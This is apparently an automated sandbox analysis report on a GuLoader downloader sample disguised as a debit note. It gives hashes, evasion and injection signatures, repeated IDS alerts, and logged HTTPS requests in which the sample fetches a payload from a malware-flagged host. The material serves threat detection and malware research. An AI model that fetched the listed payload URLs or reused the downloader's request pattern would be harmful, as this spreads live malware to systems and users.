Edit tour

Windows Analysis Report
debit-note-19-08-dn-2024.exe

Overview

General Information

Sample name:	debit-note-19-08-dn-2024.exe
Analysis ID:	1499056
MD5:	5133f0baa9ab594674eae836fd1491c7
SHA1:	389ab5a5e7ed520406265e0a1adc14d5ff478c4a
SHA256:	e13fd3d42fb6c63fcf7780701282f760bd4aaa6ad1cdb55cc586e1aca8caaf2a
Infos:

Detection

GuLoader

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Machine Learning detection for sample

Switches to a custom stack to bypass stack traces

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found dropped PE file which has not been started or loaded

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64native

debit-note-19-08-dn-2024.exe (PID: 5816 cmdline: "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe" MD5: 5133F0BAA9AB594674EAE836FD1491C7)

debit-note-19-08-dn-2024.exe (PID: 5076 cmdline: "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe" MD5: 5133F0BAA9AB594674EAE836FD1491C7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: debit-note-19-08-dn-2024.exe PID: 5816	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:35:12.874627+0200
SID:	2803270
Severity:	2
Source Port:	49834
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:36:58.028571+0200
SID:	2803270
Severity:	2
Source Port:	49844
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:38:22.106211+0200
SID:	2803270
Severity:	2
Source Port:	49852
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:32:24.398809+0200
SID:	2803270
Severity:	2
Source Port:	49818
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:34:20.207005+0200
SID:	2803270
Severity:	2
Source Port:	49829
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:35:33.923133+0200
SID:	2803270
Severity:	2
Source Port:	49836
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:35:44.422795+0200
SID:	2803270
Severity:	2
Source Port:	49837
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:39:14.576936+0200
SID:	2803270
Severity:	2
Source Port:	49857
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:35:23.403637+0200
SID:	2803270
Severity:	2
Source Port:	49835
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:37:08.534612+0200
SID:	2803270
Severity:	2
Source Port:	49845
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:38:01.116261+0200
SID:	2803270
Severity:	2
Source Port:	49850
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:33:48.667089+0200
SID:	2803270
Severity:	2
Source Port:	49826
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:38:32.606941+0200
SID:	2803270
Severity:	2
Source Port:	49853
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:33:06.530531+0200
SID:	2803270
Severity:	2
Source Port:	49822
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:38:11.609384+0200
SID:	2803270
Severity:	2
Source Port:	49851
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:40:17.503268+0200
SID:	2803270
Severity:	2
Source Port:	49863
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:33:59.198908+0200
SID:	2803270
Severity:	2
Source Port:	49827
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:34:41.251146+0200
SID:	2803270
Severity:	2
Source Port:	49831
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:34:51.795578+0200
SID:	2803270
Severity:	2
Source Port:	49832
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:39:46.050297+0200
SID:	2803270
Severity:	2
Source Port:	49860
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:35:54.951763+0200
SID:	2803270
Severity:	2
Source Port:	49838
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:35:02.339615+0200
SID:	2803270
Severity:	2
Source Port:	49833
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:32:13.887224+0200
SID:	2803270
Severity:	2
Source Port:	49817
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:36:16.007629+0200
SID:	2803270
Severity:	2
Source Port:	49840
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:37:40.083784+0200
SID:	2803270
Severity:	2
Source Port:	49848
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:37:19.045815+0200
SID:	2803270
Severity:	2
Source Port:	49846
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:38:53.610245+0200
SID:	2803270
Severity:	2
Source Port:	49855
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:33:27.613907+0200
SID:	2803270
Severity:	2
Source Port:	49824
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:33:38.137307+0200
SID:	2803270
Severity:	2
Source Port:	49825
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:34:30.714559+0200
SID:	2803270
Severity:	2
Source Port:	49830
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:38:43.103485+0200
SID:	2803270
Severity:	2
Source Port:	49854
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:39:56.534029+0200
SID:	2803270
Severity:	2
Source Port:	49861
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:32:56.006587+0200
SID:	2803270
Severity:	2
Source Port:	49821
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:37:50.616639+0200
SID:	2803270
Severity:	2
Source Port:	49849
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:32:45.444692+0200
SID:	2803270
Severity:	2
Source Port:	49820
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:36:37.019872+0200
SID:	2803270
Severity:	2
Source Port:	49842
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:39:35.568493+0200
SID:	2803270
Severity:	2
Source Port:	49859
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:39:04.092538+0200
SID:	2803270
Severity:	2
Source Port:	49856
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:37:29.555095+0200
SID:	2803270
Severity:	2
Source Port:	49847
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:32:34.915709+0200
SID:	2803270
Severity:	2
Source Port:	49819
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:40:07.011871+0200
SID:	2803270
Severity:	2
Source Port:	49862
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:36:26.512491+0200
SID:	2803270
Severity:	2
Source Port:	49841
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:36:47.515652+0200
SID:	2803270
Severity:	2
Source Port:	49843
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:39:25.088601+0200
SID:	2803270
Severity:	2
Source Port:	49858
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:34:09.694079+0200
SID:	2803270
Severity:	2
Source Port:	49828
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:33:17.068405+0200
SID:	2803270
Severity:	2
Source Port:	49823
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ETPRO MALWARE Common Downloader Header Pattern UHCa - Source IP: 192.168.11.20 - Destination IP: 172.67.207.219

Timestamp:	2024-08-26T15:36:05.482829+0200
SID:	2803270
Severity:	2
Source Port:	49839
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://gitak.top/KGukxUu155.bin~5	Avira URL Cloud: Label: malware
Source: https://gitak.top/	Avira URL Cloud: Label: malware
Source: https://gitak.top/m	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bincy	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bin	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.binificateChainPolicy	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bin/u	Avira URL Cloud: Label: malware
Source: https://gitak.top/u	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.binR	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bink	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.binl	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bin/KGukxUu155.binID=	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bin/KGukxUu155.bin	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.binm	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bin/a	Avira URL Cloud: Label: malware
Source: https://gitak.top/a	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.binID=	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bin)	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bin#	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bine	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bin/m	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bin_	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bino(	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bin:	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bina	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.binu	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bin?o	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bin0	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bin~53	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.binurT	Avira URL Cloud: Label: malware
Source: https://gitak.top/KGukxUu155.bin/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: debit-note-19-08-dn-2024.exe

ReversingLabs: Detection: 50%

Machine Learning detection for sample

Source: debit-note-19-08-dn-2024.exe

Joe Sandbox ML: detected

Source: debit-note-19-08-dn-2024.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.207.219:443 -> 192.168.11.20:49817 version: TLS 1.2

Source: debit-note-19-08-dn-2024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Code function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_004057D0
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Code function: 0_2_0040628B FindFirstFileW,FindClose,	0_2_0040628B
Source: C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe	Code function: 0_2_00402770 FindFirstFileW,	0_2_00402770

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49819 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49820 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49817 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49818 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49821 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49822 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49834 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49828 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49833 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49823 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49827 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49826 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49844 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49824 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49835 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49840 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49839 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49832 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49856 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49825 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49831 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49841 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49837 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49842 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49851 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49829 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49830 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49848 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49859 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49860 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49843 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49836 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49845 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49854 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49862 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49852 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49838 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49846 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49858 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49847 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49849 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49863 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49850 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49853 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49855 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49857 -> 172.67.207.219:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49861 -> 172.67.207.219:443

Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /KGukxUu155.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: gitak.topCache-Control: no-cache
